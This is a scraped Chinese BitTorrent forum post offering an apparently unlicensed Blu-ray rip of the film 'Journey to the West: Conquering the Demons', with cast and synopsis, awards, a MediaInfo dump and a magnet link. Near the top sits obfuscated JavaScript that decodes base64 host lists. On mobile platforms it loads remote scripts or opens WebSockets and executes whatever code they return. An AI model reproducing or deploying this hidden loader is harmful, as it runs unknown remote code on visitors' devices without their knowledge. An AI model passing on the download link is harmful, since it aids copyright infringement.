西游降魔篇[国粤语配音/中文字幕].Journey.to.the.West-Conquering.the.Demons.2013.1080p.BluRay.x265.10bit.DTS.2Audio 6.28GB

版主小s 17天前 108

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 Journey to the West: Conquering the Demons/Odyssey/三藏伏魔/大话西游之除魔传奇/西游/西游·降魔篇/除魔传奇
◎片  名 西游降魔篇
◎年  代 2013
◎产  地 中国大陆,中国香港
◎类  别 喜剧 / 奇幻 / 冒险
◎语  言 汉语普通话,粤语
◎上映日期 2013-02-07(中国香港/中国台湾) / 2013-02-10(中国大陆)
◎豆瓣评分 7.1/10 from 559034 users
◎豆瓣链接 https://movie.douban.com/subject/5308265/
◎片  长 110分钟
◎导  演 周星驰 Stephen Chow / 郭子健 Derek Kwok Chi-kin
◎编  剧 周星驰 Stephen Chow / 郭子健 Derek Kwok Chi-kin  / 霍昕 Xin Huo / 王芸 Yun Wang / 冯志强 Chi Keung Fung / 卢正雨 Zhengyu Lu / 李尚正 Sheung-ching Lee / 江玉仪 Ivy Kong / 吴承恩 Cheng'en Wu
◎主  演 文章 Zhang Wen
       舒淇 Qi Shu
       黄渤 Bo Huang
       罗志祥 Show Lo
       李尚正 Sheung-ching Lee
       陈炳强 Bingqiang Chen
       赵志凌 Chi-Ling Chiu
       周秀娜 Chrissie Chaw
       杨迪 Di Yang
       释彦能 Yanneng Shi
       冯勉恒 Min Hun Fung
       谢晶晶 Jingjing Xie
       何文辉 Wenhui He
       唐艺昕 Yixin Tang
       卢正雨 Zhengyu Lu
       张煜雯 Yuwen Zhang
       葛行于 Xingyu Ge
       张超理 Chaoli Zhang
       程思寒 Sihan Cheng
       张美娥 Mei'e Zhang
       杨能 Neng Yang
       黄孝传 Hwong Charles Shao-Chuang
       张济平 Jiping Zhang
       张昱 Yu Zhang
       许敏 Min Xu
       王磊 Lei Wang
       张辉 Hui Zhang
       史耀中 Yaozhong Shi
       李高吉 Gaoji Li
       陈依淳 Yichun Chen

◎标  签 喜剧 | 星爷 | 西游 | 奇幻 | 爱情 | 2013 | 贺岁 | 动作

◎简  介

  大唐年间妖魔横行,一小渔村因为饱受鱼妖之害请来道士(冯勉恒 饰)除妖,年轻驱魔人陈玄奘(文章 饰)前来帮忙却被误认为骗子,幸亏职业赏金驱魔人段小姐(舒淇 饰)帮助玄奘制服了鱼妖真身(李尚正 饰)。二人又在高家庄为制服猪妖猪刚鬣(陈炳强 饰) 而再次相遇,这次除妖没有成功 ,但是段小姐却对玄奘二见钟情。玄奘求助师父,得知除妖的办法是去找被压在五指山下的孙悟空(黄渤 饰)帮忙,于是他准备前往五指山,途中又遇到段小姐和手下五煞,段小姐连蒙带哄想与玄奘在一起却屡次遭拒,在四妹(周秀娜 饰)调教下想变得更有女人味却适得其反。二人决裂后玄奘独自上路,与此同时降魔师(释延能 饰)、天残脚(张超理 饰)、空虚公子(罗志祥 饰)也一同前往除妖。经过千辛万苦玄奘终于找到孙悟空,段小姐又再次出现并交给玄奘一件重要的东西,猪妖终于被降服,但是更大的危机又出现在了玄奘面前,原来孙悟空与传闻中不一样,玄奘的除魔之路能否继续?
  
  本片是周星驰多年之后的力作,演员阵容延续了以往,除了主演外,还请了诸如卢正雨、杨迪等网络红人加盟。

◎获奖情况

  第50届台北金马影展 ?(2013)
  金马奖最佳女主角(提名) 舒淇
  金马奖最佳男配角(提名) 黄渤
  金马奖最佳改编剧本(提名) 周星驰?/?郭子健?/?李尚正?/?江玉仪
  金马奖最佳造型设计(提名) 余家安?/?利碧君
  金马奖最佳动作设计(提名) 周星驰?/?谷轩昭
  金马奖最佳视觉效果(提名) 罗伟豪?/?金钟弼?/?李仁浩?/?曾咏汶
  
  第33届香港电影金像奖 ?(2014)
  最佳电影(提名)
  最佳男配角(提名) 黄渤
  最佳美术指导(提名) 林子侨
  最佳服装造型设计(提名) 余家安?/?利碧君
  
  第14届华语电影传媒大奖 ?(2014)
  观众票选最受瞩目男演员 黄渤
  观众票选最受瞩目女演员(提名) 舒淇
  
  第20届北京大学生电影节 ?(2013)
  最佳观赏效果奖(提名)
  
  第4届豆瓣电影鑫像奖 ?(2014)
  鑫豆单元最佳影片(华语)(提名)
  鑫豆单元最佳导演(华语)(提名) 周星驰
  鑫豆单元最佳女演员(华语)(提名) 舒淇
  鑫豆单元最佳喜剧片(提名)

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 4387606832229069337421090366058675474 (0x34D05B7F575174571E8BFADD8083D12)
  4. Complete name                            : Journey.to.the.West-Conq[email protected]BBQDDQ.COM.mkv
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 6.28 GiB
  8. Duration                                 : 1 h 49 min
  9. Overall bit rate                         : 8 177 kb/s
  10. Encoded date                             : UTC 2021-09-28 05:07:11
  11. Writing application                      : mkvmerge v61.0.0 ('So') 64-bit
  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  13. Video
  14. ID                                       : 1
  15. Format                                   : HEVC
  16. Format/Info                              : High Efficiency Video Coding
  17. Format profile                           : Main [email protected]@Main
  18. Codec ID                                 : V_MPEGH/ISO/HEVC
  19. Duration                                 : 1 h 49 min
  20. Bit rate                                 : 5 866 kb/s
  21. Width                                    : 1 920 pixels
  22. Height                                   : 816 pixels
  23. Display aspect ratio                     : 2.35:1
  24. Frame rate mode                          : Constant
  25. Frame rate                               : 24.000 FPS
  26. Color space                              : YUV
  27. Chroma subsampling                       : 4:2:0
  28. Bit depth                                : 10 bits
  29. Bits/(Pixel*Frame)                       : 0.156
  30. Stream size                              : 4.51 GiB (72%)
  31. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit
  32. Encoding settings                        : rc=crf / crf=21.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass
  33. Default                                  : Yes
  34. Forced                                   : No
  35. Audio #1
  36. ID                                       : 2
  37. Format                                   : DTS
  38. Format/Info                              : Digital Theater Systems
  39. Codec ID                                 : A_DTS
  40. Duration                                 : 1 h 49 min
  41. Bit rate mode                            : Constant
  42. Bit rate                                 : 1 510 kb/s
  43. Channel(s)                               : 6 channels
  44. Channel layout                           : C L R Ls Rs LFE
  45. Sampling rate                            : 48.0 kHz
  46. Frame rate                               : 93.750 FPS (512 SPF)
  47. Bit depth                                : 24 bits
  48. Compression mode                         : Lossy
  49. Stream size                              : 1.16 GiB (18%)
  50. Title                                    : Mandarin
  51. Language                                 : Chinese
  52. Default                                  : Yes
  53. Forced                                   : No
  54. Audio #2
  55. ID                                       : 3
  56. ID in the original source medium         : 4353 (0x1101)
  57. Format                                   : DTS
  58. Format/Info                              : Digital Theater Systems
  59. Codec ID                                 : A_DTS
  60. Duration                                 : 1 h 49 min
  61. Bit rate mode                            : Constant
  62. Bit rate                                 : 768 kb/s
  63. Channel(s)                               : 6 channels
  64. Channel layout                           : C L R Ls Rs LFE
  65. Sampling rate                            : 48.0 kHz
  66. Frame rate                               : 93.750 FPS (512 SPF)
  67. Bit depth                                : 16 bits
  68. Compression mode                         : Lossy
  69. Stream size                              : 604 MiB (9%)
  70. Title                                    : Cantonese
  71. Language                                 : Chinese
  72. Default                                  : No
  73. Forced                                   : No
  74. Original source medium                   : Blu-ray
  75. Text #1
  76. ID                                       : 4
  77. ID in the original source medium         : 4609 (0x1201)
  78. Format                                   : PGS
  79. Muxing mode                              : zlib
  80. Codec ID                                 : S_HDMV/PGS
  81. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  82. Duration                                 : 1 h 42 min
  83. Bit rate                                 : 23.9 kb/s
  84. Count of elements                        : 2126
  85. Stream size                              : 17.6 MiB (0%)
  86. Title                                    : chs
  87. Language                                 : Chinese
  88. Default                                  : Yes
  89. Forced                                   : No
  90. Original source medium                   : Blu-ray
  91. Text #2
  92. ID                                       : 5
  93. ID in the original source medium         : 4608 (0x1200)
  94. Format                                   : PGS
  95. Muxing mode                              : zlib
  96. Codec ID                                 : S_HDMV/PGS
  97. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  98. Duration                                 : 1 h 42 min
  99. Bit rate                                 : 24.3 kb/s
  100. Count of elements                        : 2126
  101. Stream size                              : 17.8 MiB (0%)
  102. Title                                    : cht
  103. Language                                 : Chinese
  104. Default                                  : No
  105. Forced                                   : No
  106. Original source medium                   : Blu-ray
  107. Text #3
  108. ID                                       : 6
  109. ID in the original source medium         : 4610 (0x1202)
  110. Format                                   : PGS
  111. Muxing mode                              : zlib
  112. Codec ID                                 : S_HDMV/PGS
  113. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  114. Duration                                 : 1 h 42 min
  115. Bit rate                                 : 27.3 kb/s
  116. Count of elements                        : 2126
  117. Stream size                              : 20.1 MiB (0%)
  118. Title                                    : eng
  119. Language                                 : English
  120. Default                                  : No
  121. Forced                                   : No
  122. Original source medium                   : Blu-ray
  123. Menu
  124. 00:00:00.000                             : 第 01 章
  125. 00:08:10.333                             : 第 02 章
  126. 00:19:31.916                             : 第 03 章
  127. 00:27:04.500                             : 第 04 章
  128. 00:32:08.416                             : 第 05 章
  129. 00:40:32.000                             : 第 06 章
  130. 00:45:04.500                             : 第 07 章
  131. 00:51:54.458                             : 第 08 章
  132. 00:59:26.958                             : 第 09 章
  133. 01:06:17.875                             : 第 10 章
  134. 01:13:45.000                             : 第 11 章
  135. 01:21:04.333                             : 第 12 章
  136. 01:27:45.250                             : 第 13 章
  137. 01:39:46.291                             : 第 14 章
  138. 01:45:56.916                             : 第 15 章
复制代码




TAGS 奇幻 冒险 喜剧

磁力链:
  • magnet:?xt=urn:btih:FD88FB70724C9FFFF14E81338BD1066C22A7971A
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回